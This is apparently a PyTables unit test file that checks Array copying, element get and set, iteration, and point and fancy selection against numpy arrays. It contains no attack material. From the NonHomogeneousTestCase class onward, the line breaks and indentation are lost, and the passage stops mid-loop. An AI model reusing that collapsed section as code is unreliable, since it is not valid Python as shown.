            if common.verbose:
                print("(closing file version)")
            self._reopen()
            array1 = self.h5file.root.array1
            array2 = self.h5file.root.array2

        # Assert user attributes
        if common.verbose:
            print("title of destination array-->", array2.title)
        self.assertEqual(array2.title, "title array2")

    def test04_copy(self):
        """Checking Array.copy() method (user attributes copied)"""

        if common.verbose:
            print('\n', '-=' * 30)
            # NOTE(review): message says "test05_copy" but the method is
            # test04_copy -- runtime string left untouched.
            print("Running %s.test05_copy..."
                  % self.__class__.__name__)

        # Create an Array
        arr = numpy.array([[456, 2], [3, 457]], dtype='int16')
        array1 = self.h5file.create_array(
            self.h5file.root, 'array1', arr, "title array1")
        # Append some user attrs
        array1.attrs.attr1 = "attr1"
        array1.attrs.attr2 = 2

        # Copy it to another Array
        array2 = array1.copy('/', 'array2', copyuserattrs=1)

        if self.close:
            if common.verbose:
                print("(closing file version)")
            self._reopen()
            array1 = self.h5file.root.array1
            array2 = self.h5file.root.array2

        if common.verbose:
            print("attrs array1-->", repr(array1.attrs))
            print("attrs array2-->", repr(array2.attrs))

        # Assert user attributes
        self.assertEqual(array2.attrs.attr1, "attr1")
        self.assertEqual(array2.attrs.attr2, 2)

    def test04b_copy(self):
        """Checking Array.copy() method (user attributes not copied)"""

        if common.verbose:
            print('\n', '-=' * 30)
            # NOTE(review): message says "test05b_copy" but the method is
            # test04b_copy -- runtime string left untouched.
            print("Running %s.test05b_copy..."
                  % self.__class__.__name__)

        # Create an Array
        arr = numpy.array([[456, 2], [3, 457]], dtype='int16')
        array1 = self.h5file.create_array(
            self.h5file.root, 'array1', arr, "title array1")
        # Append some user attrs
        array1.attrs.attr1 = "attr1"
        array1.attrs.attr2 = 2

        # Copy it to another Array, without the user attributes
        array2 = array1.copy('/', 'array2', copyuserattrs=0)

        if self.close:
            if common.verbose:
                print("(closing file version)")
            self._reopen()
            array1 = self.h5file.root.array1
            array2 = self.h5file.root.array2

        if common.verbose:
            print("attrs array1-->", repr(array1.attrs))
            print("attrs array2-->", repr(array2.attrs))

        # Assert user attributes
        self.assertEqual(hasattr(array2.attrs, "attr1"), 0)
        self.assertEqual(hasattr(array2.attrs, "attr2"), 0)


class CloseCopyTestCase(CopyTestCase):
    close = 1


class OpenCopyTestCase(CopyTestCase):
    close = 0


class CopyIndexTestCase(common.TempFileMixin, TestCase):
    """Checks ``Array.copy()`` with start/stop/step (set by subclasses)."""

    def test01_index(self):
        """Checking Array.copy() method with indexes."""

        if common.verbose:
            print('\n', '-=' * 30)
            print("Running %s.test01_index..."
                  % self.__class__.__name__)

        # Create a numpy
        r = numpy.arange(200, dtype='int32')
        r.shape = (100, 2)
        # Save it in a array:
        array1 = self.h5file.create_array(
            self.h5file.root, 'array1', r, "title array1")

        # Copy to another array
        array2 = array1.copy("/", 'array2',
                             start=self.start,
                             stop=self.stop,
                             step=self.step)
        if common.verbose:
            print("array1-->", array1.read())
            print("array2-->", array2.read())
            print("attrs array1-->", repr(array1.attrs))
            print("attrs array2-->", repr(array2.attrs))

        # Check that all the elements are equal
        r2 = r[self.start:self.stop:self.step]
        self.assertTrue(allequal(r2, array2.read()))

        # Assert the number of rows in array
        if common.verbose:
            print("nrows in array2-->", array2.nrows)
            print("and it should be-->", r2.shape[0])
        self.assertEqual(r2.shape[0], array2.nrows)

    def test02_indexclosef(self):
        """Checking Array.copy() method with indexes (close file version)"""

        if common.verbose:
            print('\n', '-=' * 30)
            print("Running %s.test02_indexclosef..."
                  % self.__class__.__name__)

        # Create a numpy
        r = numpy.arange(200, dtype='int32')
        r.shape = (100, 2)
        # Save it in a array:
        array1 = self.h5file.create_array(
            self.h5file.root, 'array1', r, "title array1")

        # Copy to another array
        array2 = array1.copy("/", 'array2',
                             start=self.start,
                             stop=self.stop,
                             step=self.step)
        # Close and reopen the file
        self._reopen()
        array1 = self.h5file.root.array1
        array2 = self.h5file.root.array2

        if common.verbose:
            print("array1-->", array1.read())
            print("array2-->", array2.read())
            print("attrs array1-->", repr(array1.attrs))
            print("attrs array2-->", repr(array2.attrs))

        # Check that all the elements are equal
        r2 = r[self.start:self.stop:self.step]
        self.assertTrue(allequal(r2, array2.read()))

        # Assert the number of rows in array
        if common.verbose:
            print("nrows in array2-->", array2.nrows)
            print("and it should be-->", r2.shape[0])
        self.assertEqual(r2.shape[0], array2.nrows)


# Parametrizations of CopyIndexTestCase over (start, stop, step).
class CopyIndex1TestCase(CopyIndexTestCase):
    start = 0
    stop = 7
    step = 1


class CopyIndex2TestCase(CopyIndexTestCase):
    start = 0
    stop = -1
    step = 1


class CopyIndex3TestCase(CopyIndexTestCase):
    start = 1
    stop = 7
    step = 1


class CopyIndex4TestCase(CopyIndexTestCase):
    start = 0
    stop = 6
    step = 1


class CopyIndex5TestCase(CopyIndexTestCase):
    start = 3
    stop = 7
    step = 1


class CopyIndex6TestCase(CopyIndexTestCase):
    start = 3
    stop = 6
    step = 2


class CopyIndex7TestCase(CopyIndexTestCase):
    start = 0
    stop = 7
    step = 10


class CopyIndex8TestCase(CopyIndexTestCase):
    start = 6
    stop = -1  # Negative values means starting from the end
    step = 1


class CopyIndex9TestCase(CopyIndexTestCase):
    start = 3
    stop = 4
    step = 1


class CopyIndex10TestCase(CopyIndexTestCase):
    start = 3
    stop = 4
    step = 2


class CopyIndex11TestCase(CopyIndexTestCase):
    start = -3
    stop = -1
    step = 2


class CopyIndex12TestCase(CopyIndexTestCase):
    start = -1  # Should point to the last element
    stop = None  # None should mean the last element (including it)
    step = 1


class GetItemTestCase(common.TempFileMixin, TestCase):
    """Checks ``Array.__getitem__`` (data attributes set by subclasses)."""

    def test00_single(self):
        """Single element access (character types)"""

        # Create the array under root and name 'somearray'
        a = self.charList
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen()
            arr = self.h5file.root.somearray

        # Get and compare an element
        if common.verbose:
            print("Original first element:", a[0], type(a[0]))
            print("Read first element:", arr[0], type(arr[0]))
        self.assertTrue(allequal(a[0], arr[0]))
        self.assertEqual(type(a[0]), type(arr[0]))

    def test01_single(self):
        """Single element access (numerical types)"""

        # Create the array under root and name 'somearray'
        a = self.numericalList
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen()
            arr = self.h5file.root.somearray

        # Get and compare an element
        if common.verbose:
            print("Original first element:", a[0], type(a[0]))
            print("Read first element:", arr[0], type(arr[0]))
        self.assertEqual(a[0], arr[0])
        self.assertEqual(type(a[0]), type(arr[0]))

    def test02_range(self):
        """Range element access (character types)"""

        # Create the array under root and name 'somearray'
        a = self.charListME
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen()
            arr = self.h5file.root.somearray

        # Get and compare an element
        if common.verbose:
            print("Original elements:", a[1:4])
            print("Read elements:", arr[1:4])
        self.assertTrue(allequal(a[1:4], arr[1:4]))

    def test03_range(self):
        """Range element access (numerical types)"""

        # Create the array under root and name 'somearray'
        a = self.numericalListME
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen()
            arr = self.h5file.root.somearray

        # Get and compare an element
        if common.verbose:
            print("Original elements:", a[1:4])
            print("Read elements:", arr[1:4])
        self.assertTrue(allequal(a[1:4], arr[1:4]))

    def test04_range(self):
        """Range element access, strided (character types)"""

        # Create the array under root and name 'somearray'
        a = self.charListME
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen()
            arr = self.h5file.root.somearray

        # Get and compare an element
        if common.verbose:
            print("Original elements:", a[1:4:2])
            print("Read elements:", arr[1:4:2])
        self.assertTrue(allequal(a[1:4:2], arr[1:4:2]))

    def test05_range(self):
        """Range element access, strided (numerical types)"""

        # Create the array under root and name 'somearray'
        a = self.numericalListME
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen()
            arr = self.h5file.root.somearray

        # Get and compare an element
        if common.verbose:
            print("Original elements:", a[1:4:2])
            print("Read elements:", arr[1:4:2])
        self.assertTrue(allequal(a[1:4:2], arr[1:4:2]))

    def test06_negativeIndex(self):
        """Negative Index element access (character types)"""

        # Create the array under root and name 'somearray'
        a = self.charListME
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen()
            arr = self.h5file.root.somearray

        # Get and compare an element
        if common.verbose:
            print("Original last element:", a[-1])
            print("Read last element:", arr[-1])
        self.assertTrue(allequal(a[-1], arr[-1]))

    def test07_negativeIndex(self):
        """Negative Index element access (numerical types)"""

        # Create the array under root and name 'somearray'
        a = self.numericalListME
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen()
            arr = self.h5file.root.somearray

        # Get and compare an element
        if common.verbose:
            print("Original before last element:", a[-2])
            print("Read before last element:", arr[-2])
        if isinstance(a[-2], numpy.ndarray):
            self.assertTrue(allequal(a[-2], arr[-2]))
        else:
            self.assertEqual(a[-2], arr[-2])

    def test08_negativeRange(self):
        """Negative range element access (character types)"""

        # Create the array under root and name 'somearray'
        a = self.charListME
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen()
            arr = self.h5file.root.somearray

        # Get and compare an element
        if common.verbose:
            print("Original last elements:", a[-4:-1])
            print("Read last elements:", arr[-4:-1])
        self.assertTrue(allequal(a[-4:-1], arr[-4:-1]))

    def test09_negativeRange(self):
        """Negative range element access (numerical types)"""

        # Create the array under root and name 'somearray'
        a = self.numericalListME
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen()
            arr = self.h5file.root.somearray

        # Get and compare an element
        if common.verbose:
            print("Original last elements:", a[-4:-1])
            print("Read last elements:", arr[-4:-1])
        self.assertTrue(allequal(a[-4:-1], arr[-4:-1]))


class GI1NATestCase(GetItemTestCase, TestCase):
    title = "Rank-1 case 1"
    numericalList = numpy.array([3])
    numericalListME = numpy.array([3, 2, 1, 0, 4, 5, 6])
    charList = numpy.array(["3"], 'S')
    charListME = numpy.array(
        ["321", "221", "121", "021", "421", "521", "621"], 'S')


class GI1NAOpenTestCase(GI1NATestCase):
    close = 0


class GI1NACloseTestCase(GI1NATestCase):
    close = 1


class GI2NATestCase(GetItemTestCase):
    # A more complex example
    title = "Rank-1,2 case 2"
    numericalList = numpy.array([3, 4])
    numericalListME = numpy.array([[3, 2, 1, 0, 4, 5, 6],
                                   [2, 1, 0, 4, 5, 6, 7],
                                   [4, 3, 2, 1, 0, 4, 5],
                                   [3, 2, 1, 0, 4, 5, 6],
                                   [3, 2, 1, 0, 4, 5, 6]])
    charList = numpy.array(["a", "b"], 'S')
    charListME = numpy.array(
        [["321", "221", "121", "021", "421", "521", "621"],
         ["21", "21", "11", "02", "42", "21", "61"],
         ["31", "21", "12", "21", "41", "51", "621"],
         ["321", "221", "121", "021", "421", "521", "621"],
         ["3241", "2321", "13216", "0621", "4421", "5421", "a621"],
         ["a321", "s221", "d121", "g021", "b421", "5vvv21", "6zxzxs21"]],
        'S')


class GI2NAOpenTestCase(GI2NATestCase):
    close = 0


class GI2NACloseTestCase(GI2NATestCase):
    close = 1


class SetItemTestCase(common.TempFileMixin, TestCase):
    """Checks ``Array.__setitem__`` (data attributes set by subclasses)."""

    def test00_single(self):
        """Single element update (character types)"""

        # Create the array under root and name 'somearray'
        a = self.charList
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen('a')
            arr = self.h5file.root.somearray

        # Modify a single element of a and arr:
        a[0] = b"b"
        arr[0] = b"b"

        # Get and compare an element
        if common.verbose:
            print("Original first element:", a[0])
            print("Read first element:", arr[0])
        self.assertTrue(allequal(a[0], arr[0]))

    def test01_single(self):
        """Single element update (numerical types)"""

        # Create the array under root and name 'somearray'
        a = self.numericalList
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen('a')
            arr = self.h5file.root.somearray

        # Modify elements of a and arr:
        a[0] = 333
        arr[0] = 333

        # Get and compare an element
        if common.verbose:
            print(
                "Original first element:", a[0])
            print("Read first element:", arr[0])
        self.assertEqual(a[0], arr[0])

    def test02_range(self):
        """Range element update (character types)"""

        # Create the array under root and name 'somearray'
        a = self.charListME
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen('a')
            arr = self.h5file.root.somearray

        # Modify elements of a and arr:
        a[1:3] = b"xXx"
        arr[1:3] = b"xXx"

        # Get and compare an element
        if common.verbose:
            print("Original elements:", a[1:4])
            print("Read elements:", arr[1:4])
        self.assertTrue(allequal(a[1:4], arr[1:4]))

    def test03_range(self):
        """Range element update (numerical types)"""

        # Create the array under root and name 'somearray'
        a = self.numericalListME
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen('a')
            arr = self.h5file.root.somearray

        # Modify elements of a and arr:
        s = slice(1, 3, None)
        rng = numpy.arange(a[s].size)*2 + 3
        rng.shape = a[s].shape
        a[s] = rng
        arr[s] = rng

        # Get and compare an element
        if common.verbose:
            print("Original elements:", a[1:4])
            print("Read elements:", arr[1:4])
        self.assertTrue(allequal(a[1:4], arr[1:4]))

    def test04_range(self):
        """Range element update, strided (character types)"""

        # Create the array under root and name 'somearray'
        a = self.charListME
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen('a')
            arr = self.h5file.root.somearray

        # Modify elements of a and arr:
        s = slice(1, 4, 2)
        a[s] = b"xXx"
        arr[s] = b"xXx"

        # Get and compare an element
        if common.verbose:
            print("Original elements:", a[1:4:2])
            print("Read elements:", arr[1:4:2])
        self.assertTrue(allequal(a[1:4:2], arr[1:4:2]))

    def test05_range(self):
        """Range element update, strided (numerical types)"""

        # Create the array under root and name 'somearray'
        a = self.numericalListME
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen('a')
            arr = self.h5file.root.somearray

        # Modify elements of a and arr:
        s = slice(1, 4, 2)
        rng = numpy.arange(a[s].size)*2 + 3
        rng.shape = a[s].shape
        a[s] = rng
        arr[s] = rng

        # Get and compare an element
        if common.verbose:
            print("Original elements:", a[1:4:2])
            print("Read elements:", arr[1:4:2])
        self.assertTrue(allequal(a[1:4:2], arr[1:4:2]))

    def test06_negativeIndex(self):
        """Negative Index element update (character types)"""

        # Create the array under root and name 'somearray'
        a = self.charListME
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen('a')
            arr = self.h5file.root.somearray

        # Modify elements of a and arr:
        s = -1
        a[s] = b"xXx"
        arr[s] = b"xXx"

        # Get and compare an element
        if common.verbose:
            print("Original last element:", a[-1])
            print("Read last element:", arr[-1])
        self.assertTrue(allequal(a[-1], arr[-1]))

    def test07_negativeIndex(self):
        """Negative Index element update (numerical types)"""

        # Create the array under root and name 'somearray'
        a = self.numericalListME
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen('a')
            arr = self.h5file.root.somearray

        # Modify elements of a and arr:
        s = -2
        a[s] = a[s]*2 + 3
        arr[s] = arr[s]*2 + 3

        # Get and compare an element
        if common.verbose:
            print("Original before last element:", a[-2])
            print("Read before last element:", arr[-2])
        if isinstance(a[-2], numpy.ndarray):
            self.assertTrue(allequal(a[-2], arr[-2]))
        else:
            self.assertEqual(a[-2], arr[-2])

    def test08_negativeRange(self):
        """Negative range element update (character types)"""

        # Create the array under root and name 'somearray'
        a = self.charListME
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen('a')
            arr = self.h5file.root.somearray

        # Modify elements of a and arr:
        s = slice(-4, -1, None)
        a[s] = b"xXx"
        arr[s] = b"xXx"

        # Get and compare an element
        if common.verbose:
            print(
                "Original last elements:", a[-4:-1])
            print("Read last elements:", arr[-4:-1])
        self.assertTrue(allequal(a[-4:-1], arr[-4:-1]))

    def test09_negativeRange(self):
        """Negative range element update (numerical types)"""

        # Create the array under root and name 'somearray'
        a = self.numericalListME
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen('a')
            arr = self.h5file.root.somearray

        # Modify elements of a and arr:
        s = slice(-3, -1, None)
        rng = numpy.arange(a[s].size)*2 + 3
        rng.shape = a[s].shape
        a[s] = rng
        arr[s] = rng

        # Get and compare an element
        if common.verbose:
            print("Original last elements:", a[-4:-1])
            print("Read last elements:", arr[-4:-1])
        self.assertTrue(allequal(a[-4:-1], arr[-4:-1]))

    def test10_outOfRange(self):
        """Out of range update (numerical types)"""

        # Create the array under root and name 'somearray'
        a = self.numericalListME
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen('a')
            arr = self.h5file.root.somearray

        # Modify elements of arr that are out of range:
        # s2's stop (1000) exceeds the array length; setting through the
        # Array node must clip it like numpy does for `a[s]`.
        s = slice(1, a.shape[0]+1, None)
        s2 = slice(1, 1000, None)
        rng = numpy.arange(a[s].size)*2 + 3
        rng.shape = a[s].shape
        a[s] = rng
        rng2 = numpy.arange(a[s2].size)*2 + 3
        rng2.shape = a[s2].shape
        arr[s2] = rng2

        # Get and compare an element
        if common.verbose:
            print("Original last elements:", a[-4:-1])
            print("Read last elements:", arr[-4:-1])
        self.assertTrue(allequal(a[-4:-1], arr[-4:-1]))


class SI1NATestCase(SetItemTestCase, TestCase):
    title = "Rank-1 case 1"
    numericalList = numpy.array([3])
    numericalListME = numpy.array([3, 2, 1, 0, 4, 5, 6])
    charList = numpy.array(["3"], 'S')
    charListME = numpy.array(
        ["321", "221", "121", "021", "421", "521", "621"], 'S')


class SI1NAOpenTestCase(SI1NATestCase):
    close = 0


class SI1NACloseTestCase(SI1NATestCase):
    close = 1


class SI2NATestCase(SetItemTestCase):
    # A more complex example
    title = "Rank-1,2 case 2"
    numericalList = numpy.array([3, 4])
    numericalListME = numpy.array([[3, 2, 1, 0, 4, 5, 6],
                                   [2, 1, 0, 4, 5, 6, 7],
                                   [4, 3, 2, 1, 0, 4, 5],
                                   [3, 2, 1, 0, 4, 5, 6],
                                   [3, 2, 1, 0, 4, 5, 6]])
    charList = numpy.array(["a", "b"], 'S')
    charListME = numpy.array(
        [["321", "221", "121", "021", "421", "521", "621"],
         ["21", "21", "11", "02", "42", "21", "61"],
         ["31", "21", "12", "21", "41", "51", "621"],
         ["321", "221", "121", "021", "421", "521", "621"],
         ["3241", "2321", "13216", "0621", "4421", "5421", "a621"],
         ["a321", "s221", "d121", "g021", "b421", "5vvv21", "6zxzxs21"]],
        'S')


class SI2NAOpenTestCase(SI2NATestCase):
    close = 0


class SI2NACloseTestCase(SI2NATestCase):
    close = 1


class GeneratorTestCase(common.TempFileMixin, TestCase):
    """Checks iterating over Array nodes (data set by subclasses)."""

    def test00a_single(self):
        """Testing generator access to Arrays, single elements (char)"""

        # Create the array under root and name 'somearray'
        a = self.charList
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen()
            arr = self.h5file.root.somearray

        # Get and compare an element
        ga = [i for i in a]
        garr = [i for i in arr]
        if common.verbose:
            print("Result of original iterator:", ga)
            print("Result of read generator:", garr)
        self.assertEqual(ga, garr)

    def test00b_me(self):
        """Testing generator access to Arrays, multiple elements (char)"""

        # Create the array under root and name 'somearray'
        a = self.charListME
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen()
            arr = self.h5file.root.somearray

        # Get and compare an element
        ga = [i for i in a]
        garr = [i for i in arr]
        if common.verbose:
            print("Result of original iterator:", ga)
            print("Result of read generator:", garr)
        for i in range(len(ga)):
            self.assertTrue(allequal(ga[i], garr[i]))

    def test01a_single(self):
        """Testing generator access to Arrays, single elements (numeric)"""

        # Create the array under root and name 'somearray'
        a = self.numericalList
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen()
            arr = self.h5file.root.somearray

        # Get and compare an element
        ga = [i for i in a]
        garr = [i for i in arr]
        if common.verbose:
            print("Result of original iterator:", ga)
            print("Result of read generator:", garr)
        self.assertEqual(ga, garr)

    def test01b_me(self):
        """Testing generator access to Arrays, multiple elements (numeric)"""

        # Create the array under root and name 'somearray'
        a = self.numericalListME
        arr = self.h5file.create_array(
            self.h5file.root, 'somearray', a, "Some array")

        if self.close:
            self._reopen()
            arr = self.h5file.root.somearray

        # Get and compare an element
        ga = [i for i in a]
        garr = [i for i in arr]
        if common.verbose:
            print("Result of original iterator:", ga)
            print("Result of read generator:", garr)
        for i in range(len(ga)):
            self.assertTrue(allequal(ga[i], garr[i]))


class GE1NATestCase(GeneratorTestCase):
    title = "Rank-1 case 1"
    numericalList = numpy.array([3])
    numericalListME = numpy.array([3, 2, 1, 0, 4, 5, 6])
    charList = numpy.array(["3"], 'S')
    charListME = numpy.array(
        ["321", "221", "121", "021", "421", "521", "621"], 'S')


class GE1NAOpenTestCase(GE1NATestCase):
    close = 0


class GE1NACloseTestCase(GE1NATestCase):
    close = 1


class GE2NATestCase(GeneratorTestCase):
    # A more complex example
    title = "Rank-1,2 case 2"
    numericalList = numpy.array([3, 4])
    numericalListME = numpy.array([[3, 2, 1, 0, 4, 5, 6],
                                   [2, 1, 0, 4, 5, 6, 7],
                                   [4, 3, 2, 1, 0, 4, 5],
                                   [3, 2, 1, 0, 4, 5, 6],
                                   [3, 2, 1, 0, 4, 5, 6]])
    charList = numpy.array(["a", "b"], 'S')
    charListME = numpy.array(
        [["321", "221", "121", "021", "421", "521", "621"],
         ["21", "21", "11", "02", "42", "21", "61"],
         ["31", "21", "12", "21", "41", "51", "621"],
         ["321", "221", "121", "021", "421", "521", "621"],
         ["3241", "2321", "13216", "0621", "4421", "5421", "a621"],
         ["a321", "s221", "d121", "g021", "b421", "5vvv21", "6zxzxs21"]],
        'S')


class GE2NAOpenTestCase(GE2NATestCase):
    close = 0


class GE2NACloseTestCase(GE2NATestCase):
    close = 1


class NonHomogeneousTestCase(common.TempFileMixin, TestCase):
    # NOTE(review): this class continues past the end of this chunk; the
    # first method's definition resumes in the following chunk.
    def
test(self): """Test for creation of non-homogeneous arrays.""" # This checks ticket #12. self.assertRaises(ValueError, self.h5file.create_array, '/', 'test', [1, [2, 3]]) self.assertRaises(NoSuchNodeError, self.h5file.remove_node, '/test') class TruncateTestCase(common.TempFileMixin, TestCase): def test(self): """Test for unability to truncate Array objects.""" array1 = self.h5file.create_array('/', 'array1', [0, 2]) self.assertRaises(TypeError, array1.truncate, 0) class PointSelectionTestCase(common.TempFileMixin, TestCase): def setUp(self): super(PointSelectionTestCase, self).setUp() # Limits for selections self.limits = [ (0, 1), # just one element (20, -10), # no elements (-10, 4), # several elements (0, 10), # several elements (again) ] # Create a sample array size = numpy.prod(self.shape) nparr = numpy.arange(size, dtype=numpy.int32).reshape(self.shape) self.nparr = nparr self.tbarr = self.h5file.create_array(self.h5file.root, 'array', nparr) def test01a_read(self): """Test for point-selections (read, boolean keys).""" nparr = self.nparr tbarr = self.tbarr for value1, value2 in self.limits: key = (nparr >= value1) & (nparr < value2) if common.verbose: print("Selection to test:", key) a = nparr[key] b = tbarr[key] self.assertTrue( numpy.alltrue(a == b), "NumPy array and PyTables selections does not match.") def test01b_read(self): """Test for point-selections (read, integer keys).""" nparr = self.nparr tbarr = self.tbarr for value1, value2 in self.limits: key = numpy.where((nparr >= value1) & (nparr < value2)) if common.verbose: print("Selection to test:", key) a = nparr[key] b = tbarr[key] self.assertTrue( numpy.alltrue(a == b), "NumPy array and PyTables selections does not match.") def test01c_read(self): """Test for point-selections (read, float keys).""" nparr = self.nparr tbarr = self.tbarr for value1, value2 in self.limits: key = numpy.where((nparr >= value1) & (nparr < value2)) if common.verbose: print("Selection to test:", key) # a = nparr[key] fkey = 
numpy.array(key, "f4") self.assertRaises((IndexError, TypeError), tbarr.__getitem__, fkey) def test01d_read(self): nparr = self.nparr tbarr = self.tbarr for key in self.working_keyset: if common.verbose: print("Selection to test:", key) a = nparr[key] b = tbarr[key] npt.assert_array_equal( a, b, "NumPy array and PyTables selections does not match.") def test01e_read(self): tbarr = self.tbarr for key in self.not_working_keyset: if common.verbose: print("Selection to test:", key) self.assertRaises(IndexError, tbarr.__getitem__, key) def test02a_write(self): """Test for point-selections (write, boolean keys).""" nparr = self.nparr tbarr = self.tbarr for value1, value2 in self.limits: key = (nparr >= value1) & (nparr < value2) if common.verbose: print("Selection to test:", key) s = nparr[key] nparr[key] = s * 2 tbarr[key] = s * 2 a = nparr[:] b = tbarr[:] self.assertTrue( numpy.alltrue(a == b), "NumPy array and PyTables modifications does not match.") def test02b_write(self): """Test for point-selections (write, integer keys).""" nparr = self.nparr tbarr = self.tbarr for value1, value2 in self.limits: key = numpy.where((nparr >= value1) & (nparr < value2)) if common.verbose: print("Selection to test:", key) s = nparr[key] nparr[key] = s * 2 tbarr[key] = s * 2 a = nparr[:] b = tbarr[:] self.assertTrue( numpy.alltrue(a == b), "NumPy array and PyTables modifications does not match.") def test02c_write(self): """Test for point-selections (write, integer values, broadcast).""" nparr = self.nparr tbarr = self.tbarr for value1, value2 in self.limits: key = numpy.where((nparr >= value1) & (nparr < value2)) if common.verbose: print("Selection to test:", key) # s = nparr[key] nparr[key] = 2 # force a broadcast tbarr[key] = 2 # force a broadcast a = nparr[:] b = tbarr[:] self.assertTrue( numpy.alltrue(a == b), "NumPy array and PyTables modifications does not match.") class PointSelection0(PointSelectionTestCase): shape = (3,) working_keyset = [ [0, 1], [0, -1], ] 
not_working_keyset = [ [0, 3], [0, 4], [0, -4], ] class PointSelection1(PointSelectionTestCase): shape = (5, 3, 3) working_keyset = [ [(0, 0), (0, 1), (0, 0)], [(0, 0), (0, -1), (0, 0)], ] not_working_keyset = [ [(0, 0), (0, 3), (0, 0)], [(0, 0), (0, 4), (0, 0)], [(0, 0), (0, -4), (0, 0)], [(0, 0), (0, -5), (0, 0)] ] class PointSelection2(PointSelectionTestCase): shape = (7, 3) working_keyset = [ [(0, 0), (0, 1)], [(0, 0), (0, -1)], [(0, 0), (0, -2)], ] not_working_keyset = [ [(0, 0), (0, 3)], [(0, 0), (0, 4)], [(0, 0), (0, -4)], [(0, 0), (0, -5)], ] class PointSelection3(PointSelectionTestCase): shape = (4, 3, 2, 1) working_keyset = [ [(0, 0), (0, 1), (0, 0), (0, 0)], [(0, 0), (0, -1), (0, 0), (0, 0)], ] not_working_keyset = [ [(0, 0), (0, 3), (0, 0), (0, 0)], [(0, 0), (0, 4), (0, 0), (0, 0)], [(0, 0), (0, -4), (0, 0), (0, 0)], ] class PointSelection4(PointSelectionTestCase): shape = (1, 3, 2, 5, 6) working_keyset = [ [(0, 0), (0, 1), (0, 0), (0, 0), (0, 0)], [(0, 0), (0, -1), (0, 0), (0, 0), (0, 0)], ] not_working_keyset = [ [(0, 0), (0, 3), (0, 0), (0, 0), (0, 0)], [(0, 0), (0, 4), (0, 0), (0, 0), (0, 0)], [(0, 0), (0, -4), (0, 0), (0, 0), (0, 0)], ] class FancySelectionTestCase(common.TempFileMixin, TestCase): def setUp(self): super(FancySelectionTestCase, self).setUp() M, N, O = self.shape # The next are valid selections for both NumPy and PyTables self.working_keyset = [ ([1, 3], slice(1, N-1), 2), ([M-1, 1, 3, 2], slice(None), 2), # unordered lists supported (slice(M), [N-1, 1, 0], slice(None)), (slice(1, M, 3), slice(1, N), [O-1, 1, 0]), (M-1, [2, 1], 1), (1, 2, 1), # regular selection ([1, 2], -2, -1), # negative indices ([1, -2], 2, -1), # more negative indices ([1, -2], 2, Ellipsis), # one ellipsis (Ellipsis, [1, 2]), # one ellipsis (numpy.array( [1, -2], 'i4'), 2, -1), # array 32-bit instead of list (numpy.array( [-1, 2], 'i8'), 2, -1), # array 64-bit instead of list ] # Using booleans instead of ints is deprecated since numpy 1.8 # Tests for keys that 
have to support the __index__ attribute #if (sys.version_info[0] >= 2 and sys.version_info[1] >= 5): # self.working_keyset.append( # (False, True), # equivalent to (0,1) ;-) # ) # Valid selections for NumPy, but not for PyTables (yet) # The next should raise an IndexError self.not_working_keyset = [ numpy.array([False, True], dtype="b1"), # boolean arrays ([1, 2, 1], 2, 1), # repeated values ([1, 2], 2, [1, 2]), # several lists ([], 2, 1), # empty selections (Ellipsis, [1, 2], Ellipsis), # several ellipsis # Using booleans instead of ints is deprecated since numpy 1.8 ([False, True]), # boolean values with incompatible shape ] # The next should raise an IndexError in both NumPy and PyTables self.not_working_oob = [ ([1, 2], 2, 1000), # out-of-bounds selections ([1, 2], 2000, 1), # out-of-bounds selections ] # The next should raise a IndexError in both NumPy and PyTables self.not_working_too_many = [ ([1, 2], 2, 1, 1), ] # Create a sample array nparr = numpy.empty(self.shape, dtype=numpy.int32) data = numpy.arange(N * O, dtype=numpy.int32).reshape(N, O) for i in xrange(M): nparr[i] = data * i self.nparr = nparr self.tbarr = self.h5file.create_array(self.h5file.root, 'array', nparr) def test01a_read(self): """Test for fancy-selections (working selections, read).""" nparr = self.nparr tbarr = self.tbarr for key in self.working_keyset: if common.verbose: print("Selection to test:", key) a = nparr[key] b = tbarr[key] self.assertTrue( numpy.alltrue(a == b), "NumPy array and PyTables selections does not match.") def test01b_read(self): """Test for fancy-selections (not working selections, read).""" # nparr = self.nparr tbarr = self.tbarr for key in self.not_working_keyset: if common.verbose: print("Selection to test:", key) # a = nparr[key] self.assertRaises(IndexError, tbarr.__getitem__, key) def test01c_read(self): """Test for fancy-selections (out-of-bound indexes, read).""" nparr = self.nparr tbarr = self.tbarr for 